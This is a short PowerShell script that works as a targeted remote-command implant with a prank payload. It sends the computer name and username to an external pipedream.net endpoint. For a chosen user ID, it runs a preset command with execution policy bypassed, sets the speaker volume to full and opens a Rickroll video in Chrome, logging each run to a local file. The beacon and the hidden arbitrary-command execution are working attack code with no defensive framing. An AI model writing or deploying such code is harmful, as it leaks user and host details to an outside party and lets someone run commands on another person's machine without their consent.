$target_user = "41771"
$command = ";"

#$e = dir "c:\Cache\pc-client.exe-1.0.0.0-0"

iwr -uri https://enozw8a1fwe1j.x.pipedream.net/$env:computername/$env:username -Body (Out-String -InputObject $command) -Method post


if ( $Env:UserName -eq $target_user) {
	if (Test-Path "C:\Cache\tmp"){
		if (!((Get-Content "C:\Cache\tmp") -eq $command)){
			powershell -ep bypass -Command $command
			Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
			Set-Speaker -Volume 50
			Start-Process Chrome.exe "https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUXbmV2ZXIgZ29ubmEgZ2l2ZSB5b3UgdXA%3D"
			$command | Out-File -FIlePath "C:\Cache\tmp"
		}
	} else {
		powershell -ep bypass -Command $command
		$command | Out-File -FIlePath "C:\Cache\tmp"	
	}
}
